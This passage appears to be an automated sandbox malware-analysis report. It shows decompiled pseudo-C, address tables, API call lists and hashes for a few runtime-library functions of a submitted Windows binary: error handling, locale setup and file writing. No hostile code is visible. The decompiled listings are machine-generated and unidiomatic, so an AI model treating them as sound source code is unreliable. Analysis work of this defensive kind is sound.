                                                                                                                                                                          0x00a04319
                                                                                                                                                                          0x00a0431b
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0431d
                                                                                                                                                                          0x00a04320
                                                                                                                                                                          0x00a04320
                                                                                                                                                                          0x00a0431b
                                                                                                                                                                          0x00a042a7
                                                                                                                                                                          0x00a042a2
                                                                                                                                                                          0x00a04281
                                                                                                                                                                          0x00a04286
                                                                                                                                                                          0x00a04286

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,?,009FD25E,00000000,00000000,?,?,00A06982,00000000,00000000,?,00000000,?), ref: 00A041D5
                                                                                                                                                                          • _free.LIBCMT ref: 00A04232
                                                                                                                                                                          • _free.LIBCMT ref: 00A04268
                                                                                                                                                                          • SetLastError.KERNEL32(00000000,00000002,000000FF,?,00A06982,00000000,00000000,?,00000000,?), ref: 00A04273
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast_free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2283115069-0
                                                                                                                                                                          • Opcode ID: 90479663dba4f9e9a7480b6ad9b048807f64e60a784ff0f514fe61fa4ebe2f61
                                                                                                                                                                          • Instruction ID: 495753541f73bc28434c3af1fc8511b9222e01f7975c1ff2dd07dff6ee06b48d
                                                                                                                                                                          • Opcode Fuzzy Hash: 90479663dba4f9e9a7480b6ad9b048807f64e60a784ff0f514fe61fa4ebe2f61
                                                                                                                                                                          • Instruction Fuzzy Hash: 6E110CF770010D6FC61167F5BE85E6A2569BBDE376B240234F724861F1DE768C124220
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 009F19A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 534 9f19a0-9f19e6 call 9f6a1b 537 9f19f8-9f1a02 call 9f6be2 534->537 538 9f19e8-9f19ea call 9f6e98 534->538 541 9f19ef-9f19f5 538->541
                                                                                                                                                                          C-Code - Quality: 67%
                                                                                                                                                                          			E009F19A0(void* __ebx, intOrPtr* __ecx) {
				void* __edi;
				void* __esi;
				void* _t73;
				intOrPtr* _t79;
				intOrPtr _t89;
				intOrPtr* _t96;
				intOrPtr* _t108;
				intOrPtr _t110;
				void* _t111;
				intOrPtr _t112;
				intOrPtr _t113;
				void* _t114;
				void* _t115;
				intOrPtr* _t117;
				intOrPtr _t118;
				intOrPtr* _t120;
				intOrPtr* _t123;
				signed int _t125;
				intOrPtr _t126;
				intOrPtr* _t127;
				intOrPtr _t129;
				signed int _t133;
				void* _t135;
				void* _t136;

				_t98 = __ecx;
				_t123 = __ecx;
				E009F6A1B(__ecx, 0);
				 *((intOrPtr*)(__ecx + 4)) = 0;
				 *((short*)(__ecx + 0x18)) = 0;
				 *((intOrPtr*)(__ecx + 0x1c)) = 0;
				 *((short*)(__ecx + 0x20)) = 0;
				 *((intOrPtr*)(__ecx + 0x24)) = 0;
				 *((char*)(__ecx + 0x28)) = 0;
				 *((intOrPtr*)(__ecx + 0x2c)) = 0;
				 *((char*)(__ecx + 0x30)) = 0;
				_t62 =  *((intOrPtr*)(_t135 + 8));
				 *((char*)(__ecx + 8)) = 0;
				 *((intOrPtr*)(__ecx + 0xc)) = 0;
				 *((char*)(__ecx + 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0x14)) = 0;
				if( *((intOrPtr*)(_t135 + 8)) == 0) {
					E009F6BE2(__eflags, "bad locale name");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_t136 = _t135 - 0x50;
					_push(__ebx);
					_push(_t123);
					_t117 =  *((intOrPtr*)(_t136 + 0x6c));
					_t96 = _t98;
					__eflags =  *((intOrPtr*)(_t117 + 0x14)) - 0x10;
					_t133 =  *(_t117 + 0x10);
					if( *((intOrPtr*)(_t117 + 0x14)) >= 0x10) {
						_t117 =  *_t117;
					}
					__eflags = _t133 - 0x10;
					if(_t133 >= 0x10) {
						_t125 = _t133 | 0x0000000f;
						__eflags = _t125 - 0x7fffffff;
						_t126 =  >  ? 0x7fffffff : _t125;
						_push(_t126 + 1);
						 *((intOrPtr*)(_t136 + 0x18)) = E009F4090(_t96, _t111, _t117, _t126);
						E009F9CF0(_t66, _t117, _t133 + 1);
						_t118 =  *((intOrPtr*)(_t136 + 0x70));
						_t136 = _t136 + 0xc;
						 *((intOrPtr*)(_t136 + 0x2c)) = _t126;
						_t127 =  *((intOrPtr*)(_t136 + 0x68));
						 *(_t136 + 0x28) = _t133;
						goto L9;
					} else {
						_t127 =  *((intOrPtr*)(_t136 + 0x68));
						 *(_t136 + 0x28) = _t133;
						 *((intOrPtr*)(_t136 + 0x2c)) = 0xf;
						asm("movups xmm0, [edi]");
						_t118 =  *((intOrPtr*)(_t136 + 0x64));
						asm("movups [esp+0x18], xmm0");
						__eflags = _t133;
						if(_t133 != 0) {
							L9:
							_push(2);
							_push(0xa1423c);
							L009F4140(_t96, _t136 + 0x20, _t118, _t127);
						}
					}
					 *((intOrPtr*)( *_t127 + 8))(_t136 + 0x30, _t118);
					__eflags =  *((intOrPtr*)(_t136 + 0x44)) - 0x10;
					_push( *((intOrPtr*)(_t136 + 0x40)));
					_t72 =  >=  ?  *((void*)(_t136 + 0x34)) : _t136 + 0x30;
					_push( >=  ?  *((void*)(_t136 + 0x34)) : _t136 + 0x30);
					_t73 = L009F4140(_t96, _t136 + 0x1c, _t118, _t127);
					_t112 =  *((intOrPtr*)(_t136 + 0x44));
					__eflags = _t112 - 0x10;
					if(_t112 < 0x10) {
						L14:
						asm("movups xmm1, [esp+0x18]");
						__eflags =  *((intOrPtr*)(_t136 + 0x2c)) - 0x10;
						asm("movq xmm0, [esp+0x28]");
						asm("movd eax, xmm1");
						asm("movq [esp+0x58], xmm0");
						asm("xorps xmm0, xmm0");
						 *_t96 = 0xa141c8;
						_t106 =  >=  ? _t73 : _t136 + 0x48;
						asm("movq [ebx+0x4], xmm0");
						 *((intOrPtr*)(_t136 + 0x10)) =  >=  ? _t73 : _t136 + 0x48;
						 *((char*)(_t136 + 0x18)) = 1;
						asm("movups [esp+0x50], xmm1");
						E009F983D(_t136 + 0x14, _t96 + 4);
						_t113 =  *((intOrPtr*)(_t136 + 0x64));
						_t136 = _t136 + 8;
						 *_t96 = 0xa14228;
						__eflags = _t113 - 0x10;
						if(_t113 < 0x10) {
							L18:
							 *((intOrPtr*)(_t96 + 0xc)) =  *((intOrPtr*)(_t136 + 0x64));
							 *_t96 = 0xa14234;
							 *((intOrPtr*)(_t96 + 0x10)) =  *((intOrPtr*)(_t136 + 0x68));
							return _t96;
						} else {
							_t108 =  *((intOrPtr*)(_t136 + 0x48));
							_t114 = _t113 + 1;
							_t79 = _t108;
							__eflags = _t114 - 0x1000;
							if(_t114 < 0x1000) {
								L17:
								_push(_t114);
								E009F89FD(_t108);
								_t136 = _t136 + 8;
								goto L18;
							} else {
								_t108 =  *((intOrPtr*)(_t108 - 4));
								_t114 = _t114 + 0x23;
								__eflags = _t79 - _t108 + 0xfffffffc - 0x1f;
								if(__eflags > 0) {
									goto L20;
								} else {
									goto L17;
								}
							}
						}
					} else {
						_t110 =  *((intOrPtr*)(_t136 + 0x30));
						_t115 = _t112 + 1;
						_t89 = _t110;
						__eflags = _t115 - 0x1000;
						if(_t115 < 0x1000) {
							L13:
							_push(_t115);
							_t73 = E009F89FD(_t110);
							_t136 = _t136 + 8;
							goto L14;
						} else {
							_t108 =  *((intOrPtr*)(_t110 - 4));
							_t114 = _t115 + 0x23;
							__eflags = _t89 - _t108 + 0xfffffffc - 0x1f;
							if(__eflags > 0) {
								E009FCBDF(_t96, _t108, _t114, __eflags);
								L20:
								E009FCBDF(_t96, _t108, _t114, __eflags);
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_push(_t127);
								_t129 =  *((intOrPtr*)(_t136 + 8));
								asm("xorps xmm0, xmm0");
								_push(_t118);
								_t120 = _t108;
								 *_t120 = 0xa141c8;
								asm("movq [eax], xmm0");
								E009F983D(_t129 + 4, _t120 + 4);
								 *_t120 = 0xa14234;
								 *((intOrPtr*)(_t120 + 0xc)) =  *((intOrPtr*)(_t129 + 0xc));
								 *((intOrPtr*)(_t120 + 0x10)) =  *((intOrPtr*)(_t129 + 0x10));
								return _t120;
							} else {
								goto L13;
							}
						}
					}
				} else {
					E009F6E98(__ecx, __ecx, _t62); // executed
					return _t123;
				}
			}



























                                                                                                                                                                          0x009f19a0
                                                                                                                                                                          0x009f19a3
                                                                                                                                                                          0x009f19a5
                                                                                                                                                                          0x009f19ac
                                                                                                                                                                          0x009f19b3
                                                                                                                                                                          0x009f19b7
                                                                                                                                                                          0x009f19ba
                                                                                                                                                                          0x009f19be
                                                                                                                                                                          0x009f19c1
                                                                                                                                                                          0x009f19c4
                                                                                                                                                                          0x009f19c7
                                                                                                                                                                          0x009f19ca
                                                                                                                                                                          0x009f19ce
                                                                                                                                                                          0x009f19d2
                                                                                                                                                                          0x009f19d9
                                                                                                                                                                          0x009f19dd
                                                                                                                                                                          0x009f19e6
                                                                                                                                                                          0x009f19fd
                                                                                                                                                                          0x009f1a02
                                                                                                                                                                          0x009f1a03
                                                                                                                                                                          0x009f1a04
                                                                                                                                                                          0x009f1a05
                                                                                                                                                                          0x009f1a06
                                                                                                                                                                          0x009f1a07
                                                                                                                                                                          0x009f1a08
                                                                                                                                                                          0x009f1a09
                                                                                                                                                                          0x009f1a0a
                                                                                                                                                                          0x009f1a0b
                                                                                                                                                                          0x009f1a0c
                                                                                                                                                                          0x009f1a0d
                                                                                                                                                                          0x009f1a0e
                                                                                                                                                                          0x009f1a0f
                                                                                                                                                                          0x009f1a10
                                                                                                                                                                          0x009f1a13
                                                                                                                                                                          0x009f1a15
                                                                                                                                                                          0x009f1a17
                                                                                                                                                                          0x009f1a1b
                                                                                                                                                                          0x009f1a1d
                                                                                                                                                                          0x009f1a21
                                                                                                                                                                          0x009f1a24
                                                                                                                                                                          0x009f1a26
                                                                                                                                                                          0x009f1a26
                                                                                                                                                                          0x009f1a28
                                                                                                                                                                          0x009f1a2b
                                                                                                                                                                          0x009f1a5a
                                                                                                                                                                          0x009f1a5d
                                                                                                                                                                          0x009f1a5f
                                                                                                                                                                          0x009f1a65
                                                                                                                                                                          0x009f1a6e
                                                                                                                                                                          0x009f1a75
                                                                                                                                                                          0x009f1a7a
                                                                                                                                                                          0x009f1a7e
                                                                                                                                                                          0x009f1a81
                                                                                                                                                                          0x009f1a85
                                                                                                                                                                          0x009f1a89
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f1a2d
                                                                                                                                                                          0x009f1a2d
                                                                                                                                                                          0x009f1a31
                                                                                                                                                                          0x009f1a35
                                                                                                                                                                          0x009f1a3d
                                                                                                                                                                          0x009f1a40
                                                                                                                                                                          0x009f1a44
                                                                                                                                                                          0x009f1a49
                                                                                                                                                                          0x009f1a4b
                                                                                                                                                                          0x009f1a8d
                                                                                                                                                                          0x009f1a8d
                                                                                                                                                                          0x009f1a8f
                                                                                                                                                                          0x009f1a98
                                                                                                                                                                          0x009f1a98
                                                                                                                                                                          0x009f1a4b
                                                                                                                                                                          0x009f1aa7
                                                                                                                                                                          0x009f1aaa
                                                                                                                                                                          0x009f1ab3
                                                                                                                                                                          0x009f1ab7
                                                                                                                                                                          0x009f1ac0
                                                                                                                                                                          0x009f1ac1
                                                                                                                                                                          0x009f1ac6
                                                                                                                                                                          0x009f1aca
                                                                                                                                                                          0x009f1acd
                                                                                                                                                                          0x009f1afc
                                                                                                                                                                          0x009f1afc
                                                                                                                                                                          0x009f1b05
                                                                                                                                                                          0x009f1b0a
                                                                                                                                                                          0x009f1b10
                                                                                                                                                                          0x009f1b14
                                                                                                                                                                          0x009f1b1a
                                                                                                                                                                          0x009f1b1d
                                                                                                                                                                          0x009f1b23
                                                                                                                                                                          0x009f1b26
                                                                                                                                                                          0x009f1b2e
                                                                                                                                                                          0x009f1b37
                                                                                                                                                                          0x009f1b3d
                                                                                                                                                                          0x009f1b42
                                                                                                                                                                          0x009f1b47
                                                                                                                                                                          0x009f1b4b
                                                                                                                                                                          0x009f1b4e
                                                                                                                                                                          0x009f1b54
                                                                                                                                                                          0x009f1b57
                                                                                                                                                                          0x009f1b82
                                                                                                                                                                          0x009f1b8c
                                                                                                                                                                          0x009f1b92
                                                                                                                                                                          0x009f1b98
                                                                                                                                                                          0x009f1b9f
                                                                                                                                                                          0x009f1b59
                                                                                                                                                                          0x009f1b59
                                                                                                                                                                          0x009f1b5d
                                                                                                                                                                          0x009f1b5e
                                                                                                                                                                          0x009f1b60
                                                                                                                                                                          0x009f1b66
                                                                                                                                                                          0x009f1b78
                                                                                                                                                                          0x009f1b78
                                                                                                                                                                          0x009f1b7a
                                                                                                                                                                          0x009f1b7f
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f1b68
                                                                                                                                                                          0x009f1b68
                                                                                                                                                                          0x009f1b6b
                                                                                                                                                                          0x009f1b73
                                                                                                                                                                          0x009f1b76
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f1b76
                                                                                                                                                                          0x009f1b66
                                                                                                                                                                          0x009f1acf
                                                                                                                                                                          0x009f1acf
                                                                                                                                                                          0x009f1ad3
                                                                                                                                                                          0x009f1ad4
                                                                                                                                                                          0x009f1ad6
                                                                                                                                                                          0x009f1adc
                                                                                                                                                                          0x009f1af2
                                                                                                                                                                          0x009f1af2
                                                                                                                                                                          0x009f1af4
                                                                                                                                                                          0x009f1af9
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f1ade
                                                                                                                                                                          0x009f1ade
                                                                                                                                                                          0x009f1ae1
                                                                                                                                                                          0x009f1ae9
                                                                                                                                                                          0x009f1aec
                                                                                                                                                                          0x009f1ba2
                                                                                                                                                                          0x009f1ba7
                                                                                                                                                                          0x009f1ba7
                                                                                                                                                                          0x009f1bac
                                                                                                                                                                          0x009f1bad
                                                                                                                                                                          0x009f1bae
                                                                                                                                                                          0x009f1baf
                                                                                                                                                                          0x009f1bb0
                                                                                                                                                                          0x009f1bb1
                                                                                                                                                                          0x009f1bb5
                                                                                                                                                                          0x009f1bb8
                                                                                                                                                                          0x009f1bb9
                                                                                                                                                                          0x009f1bbf
                                                                                                                                                                          0x009f1bc5
                                                                                                                                                                          0x009f1bcd
                                                                                                                                                                          0x009f1bd5
                                                                                                                                                                          0x009f1be1
                                                                                                                                                                          0x009f1be6
                                                                                                                                                                          0x009f1beb
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f1aec
                                                                                                                                                                          0x009f1adc
                                                                                                                                                                          0x009f19e8
                                                                                                                                                                          0x009f19ea
                                                                                                                                                                          0x009f19f5
                                                                                                                                                                          0x009f19f5

                                                                                                                                                                          APIs
                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 009F19A5
                                                                                                                                                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 009F19EA
                                                                                                                                                                            • Part of subcall function 009F6E98: _Yarn.LIBCPMT ref: 009F6EB7
                                                                                                                                                                            • Part of subcall function 009F6E98: _Yarn.LIBCPMT ref: 009F6EDB
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                                                          • String ID: bad locale name
                                                                                                                                                                          • API String ID: 1908188788-1405518554
                                                                                                                                                                          • Opcode ID: 75bbe9e22d2fd89f3bdf5e3dc535047649c09a933243542bd7bc69678d74f0d6
                                                                                                                                                                          • Instruction ID: d7d4d30f344fe1f438711d01b2707d597446a53e7b951e40daaa409985730306
                                                                                                                                                                          • Opcode Fuzzy Hash: 75bbe9e22d2fd89f3bdf5e3dc535047649c09a933243542bd7bc69678d74f0d6
                                                                                                                                                                          • Instruction Fuzzy Hash: 9BF01761105B809ED370DF39C504757BEE0AF29310F048E1DE5CAC7A51E3B5E548CBA6
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A0810B Relevance: 4.7, APIs: 3, Instructions: 170fileCOMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 543 a0810b-a08127 544 a0812d-a0812f 543->544 545 a082de 543->545 546 a08151-a08172 544->546 547 a08131-a08144 call 9feb98 call 9febab call 9fcbcf 544->547 548 a082e0-a082e4 545->548 550 a08174-a08177 546->550 551 a08179-a0817f 546->551 566 a08149-a0814c 547->566 550->551 553 a08184-a08189 550->553 551->547 554 a08181 551->554 555 a0819a-a081a3 call a07cb2 553->555 556 a0818b-a08197 call a097e9 553->556 554->553 564 a081a5-a081a7 555->564 565 a081de-a081f0 555->565 556->555 569 a081a9-a081ae 564->569 570 a081cb-a081d4 call a0789e 564->570 567 a081f2-a081f8 565->567 568 a08238-a08259 WriteFile 565->568 566->548 571 a08228-a08231 call a07d23 567->571 572 a081fa-a081fd 567->572 575 a08264 568->575 576 a0825b-a08261 GetLastError 568->576 573 a081b4-a081c1 call a07c4a 569->573 574 a082a8-a082ba 569->574 585 a081d9-a081dc 570->585 592 a08236 571->592 579 a08218-a08226 call a07ee7 572->579 580 a081ff-a08202 572->580 586 a081c4-a081c6 573->586 583 a082c1-a082d4 call 9febab call 9feb98 574->583 584 a082bc-a082bf 574->584 578 a08267-a08272 575->578 576->575 587 a08274-a08279 578->587 588 a082d9-a082dc 578->588 579->585 580->574 589 a08208-a08216 call a07dfe 580->589 583->566 584->545 584->583 585->586 586->578 595 a082a5 587->595 596 a0827b-a08280 587->596 588->548 589->585 592->585 595->574 600 a08282-a08294 call 9febab call 9feb98 596->600 601 a08299-a082a0 call 9feb75 596->601 600->566 601->566
                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                          			E00A0810B(signed int _a4, void* _a8, signed int _a12) {
				long _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				long _v40;
				char _v44;
				signed int _t59;
				signed int _t64;
				signed int _t66;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t81;
				signed int _t84;
				signed int _t91;
				signed int _t93;
				intOrPtr _t95;
				signed int _t100;
				intOrPtr _t101;
				void* _t102;
				signed int _t105;
				signed int _t107;
				void* _t109;

				_t93 = _a12;
				_v8 = _t93;
				_t105 = _a4;
				_t102 = _a8;
				_v16 = _t102;
				if(_t93 == 0) {
					L37:
					__eflags = 0;
					return 0;
				}
				_t113 = _t102;
				if(_t102 != 0) {
					_t100 = _t105 >> 6;
					_t59 = (_t105 & 0x0000003f) * 0x38;
					_v20 = _t100;
					_t101 =  *((intOrPtr*)(0xa46528 + _t100 * 4));
					_v12 = _t59;
					_t91 =  *((intOrPtr*)(_t101 + _t59 + 0x29));
					__eflags = _t91 - 2;
					if(_t91 == 2) {
						L6:
						__eflags =  !_t93 & 0x00000001;
						if(__eflags == 0) {
							goto L2;
						}
						_t59 = _v12;
						L8:
						__eflags =  *(_t101 + _t59 + 0x28) & 0x00000020;
						if(__eflags != 0) {
							E00A097E9(_t105, 0, 0, 2);
							_t109 = _t109 + 0x10;
						}
						_t66 = E00A07CB2(_t101, __eflags, _t105); // executed
						__eflags = _t66;
						if(_t66 == 0) {
							_t95 =  *((intOrPtr*)(0xa46528 + _v20 * 4));
							_t68 = _v12;
							__eflags =  *((char*)(_t95 + _t68 + 0x28));
							if( *((char*)(_t95 + _t68 + 0x28)) >= 0) {
								asm("stosd");
								asm("stosd");
								asm("stosd");
								_t71 = WriteFile( *(_t95 + _t68 + 0x18), _v16, _v8,  &_v40, 0);
								__eflags = _t71;
								if(_t71 == 0) {
									_v44 = GetLastError();
								}
								goto L27;
							}
							_t81 = _t91;
							__eflags = _t81;
							if(_t81 == 0) {
								E00A07D23( &_v44, _t105, _t102, _v8); // executed
								goto L16;
							}
							_t84 = _t81 - 1;
							__eflags = _t84;
							if(_t84 == 0) {
								_t83 = E00A07EE7( &_v44, _t105, _t102, _v8);
								goto L16;
							}
							__eflags = _t84 != 1;
							if(_t84 != 1) {
								goto L33;
							}
							_t83 = E00A07DFE( &_v44, _t105, _t102, _v8);
							goto L16;
						} else {
							__eflags = _t91;
							if(__eflags == 0) {
								_t83 = E00A0789E(__eflags,  &_v44, _t105, _t102, _v8);
								L16:
								L14:
								L27:
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t72 = _v28;
								__eflags = _t72;
								if(_t72 != 0) {
									return _t72 - _v24;
								}
								_t74 = _v32;
								__eflags = _t74;
								if(_t74 == 0) {
									_t102 = _v16;
									L33:
									__eflags =  *( *((intOrPtr*)(0xa46528 + _v20 * 4)) + _v12 + 0x28) & 0x00000040;
									if(__eflags == 0) {
										L35:
										 *((intOrPtr*)(E009FEBAB(__eflags))) = 0x1c;
										_t64 = E009FEB98(__eflags);
										 *_t64 =  *_t64 & 0x00000000;
										L3:
										return _t64 | 0xffffffff;
									}
									__eflags =  *_t102 - 0x1a;
									if(__eflags == 0) {
										goto L37;
									}
									goto L35;
								}
								_t107 = 5;
								__eflags = _t74 - _t107;
								if(__eflags != 0) {
									_t64 = E009FEB75(_t74);
								} else {
									 *((intOrPtr*)(E009FEBAB(__eflags))) = 9;
									_t64 = E009FEB98(__eflags);
									 *_t64 = _t107;
								}
								goto L3;
							}
							__eflags = _t91 - 1 - 1;
							if(_t91 - 1 > 1) {
								goto L33;
							}
							E00A07C4A( &_v44, _t102, _v8);
							goto L14;
						}
					}
					__eflags = _t91 - 1;
					if(_t91 != 1) {
						goto L8;
					}
					goto L6;
				}
				L2:
				 *(E009FEB98(_t113)) =  *_t62 & 0x00000000;
				 *((intOrPtr*)(E009FEBAB( *_t62))) = 0x16;
				_t64 = E009FCBCF();
				goto L3;
			}






























                                                                                                                                                                          0x00a08113
                                                                                                                                                                          0x00a08116
                                                                                                                                                                          0x00a0811b
                                                                                                                                                                          0x00a0811f
                                                                                                                                                                          0x00a08122
                                                                                                                                                                          0x00a08127
                                                                                                                                                                          0x00a082de
                                                                                                                                                                          0x00a082de
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a082de
                                                                                                                                                                          0x00a0812d
                                                                                                                                                                          0x00a0812f
                                                                                                                                                                          0x00a08155
                                                                                                                                                                          0x00a0815b
                                                                                                                                                                          0x00a0815e
                                                                                                                                                                          0x00a08161
                                                                                                                                                                          0x00a08168
                                                                                                                                                                          0x00a0816b
                                                                                                                                                                          0x00a0816f
                                                                                                                                                                          0x00a08172
                                                                                                                                                                          0x00a08179
                                                                                                                                                                          0x00a0817d
                                                                                                                                                                          0x00a0817f
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a08181
                                                                                                                                                                          0x00a08184
                                                                                                                                                                          0x00a08184
                                                                                                                                                                          0x00a08189
                                                                                                                                                                          0x00a08192
                                                                                                                                                                          0x00a08197
                                                                                                                                                                          0x00a08197
                                                                                                                                                                          0x00a0819b
                                                                                                                                                                          0x00a081a1
                                                                                                                                                                          0x00a081a3
                                                                                                                                                                          0x00a081e1
                                                                                                                                                                          0x00a081e8
                                                                                                                                                                          0x00a081eb
                                                                                                                                                                          0x00a081f0
                                                                                                                                                                          0x00a08241
                                                                                                                                                                          0x00a08244
                                                                                                                                                                          0x00a08245
                                                                                                                                                                          0x00a08251
                                                                                                                                                                          0x00a08257
                                                                                                                                                                          0x00a08259
                                                                                                                                                                          0x00a08261
                                                                                                                                                                          0x00a08261
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a08264
                                                                                                                                                                          0x00a081f5
                                                                                                                                                                          0x00a081f5
                                                                                                                                                                          0x00a081f8
                                                                                                                                                                          0x00a08231
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a08231
                                                                                                                                                                          0x00a081fa
                                                                                                                                                                          0x00a081fa
                                                                                                                                                                          0x00a081fd
                                                                                                                                                                          0x00a08221
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a08221
                                                                                                                                                                          0x00a081ff
                                                                                                                                                                          0x00a08202
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a08211
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a081a5
                                                                                                                                                                          0x00a081a5
                                                                                                                                                                          0x00a081a7
                                                                                                                                                                          0x00a081d4
                                                                                                                                                                          0x00a081d9
                                                                                                                                                                          0x00a081c4
                                                                                                                                                                          0x00a08267
                                                                                                                                                                          0x00a0826a
                                                                                                                                                                          0x00a0826b
                                                                                                                                                                          0x00a0826c
                                                                                                                                                                          0x00a0826d
                                                                                                                                                                          0x00a08270
                                                                                                                                                                          0x00a08272
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a082d9
                                                                                                                                                                          0x00a08274
                                                                                                                                                                          0x00a08277
                                                                                                                                                                          0x00a08279
                                                                                                                                                                          0x00a082a5
                                                                                                                                                                          0x00a082a8
                                                                                                                                                                          0x00a082b5
                                                                                                                                                                          0x00a082ba
                                                                                                                                                                          0x00a082c1
                                                                                                                                                                          0x00a082c6
                                                                                                                                                                          0x00a082cc
                                                                                                                                                                          0x00a082d1
                                                                                                                                                                          0x00a08149
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a08149
                                                                                                                                                                          0x00a082bc
                                                                                                                                                                          0x00a082bf
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a082bf
                                                                                                                                                                          0x00a0827d
                                                                                                                                                                          0x00a0827e
                                                                                                                                                                          0x00a08280
                                                                                                                                                                          0x00a0829a
                                                                                                                                                                          0x00a08282
                                                                                                                                                                          0x00a08287
                                                                                                                                                                          0x00a0828d
                                                                                                                                                                          0x00a08292
                                                                                                                                                                          0x00a08292
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a08280
                                                                                                                                                                          0x00a081ab
                                                                                                                                                                          0x00a081ae
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a081bc
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a081c1
                                                                                                                                                                          0x00a081a3
                                                                                                                                                                          0x00a08174
                                                                                                                                                                          0x00a08177
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a08177
                                                                                                                                                                          0x00a08131
                                                                                                                                                                          0x00a08136
                                                                                                                                                                          0x00a0813e
                                                                                                                                                                          0x00a08144
                                                                                                                                                                          0x00000000

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A0789E: GetConsoleOutputCP.KERNEL32(?,00000000,?), ref: 00A078E6
                                                                                                                                                                          • WriteFile.KERNEL32(?,?,?,00A21700,00000000,00000000,00000000,00000000,?,00A21700,00000010,009FFC43,00000000,00000000,00000000), ref: 00A08251
                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,?,00000000), ref: 00A0825B
                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00A0829A
                                                                                                                                                                          Memory Dump Source
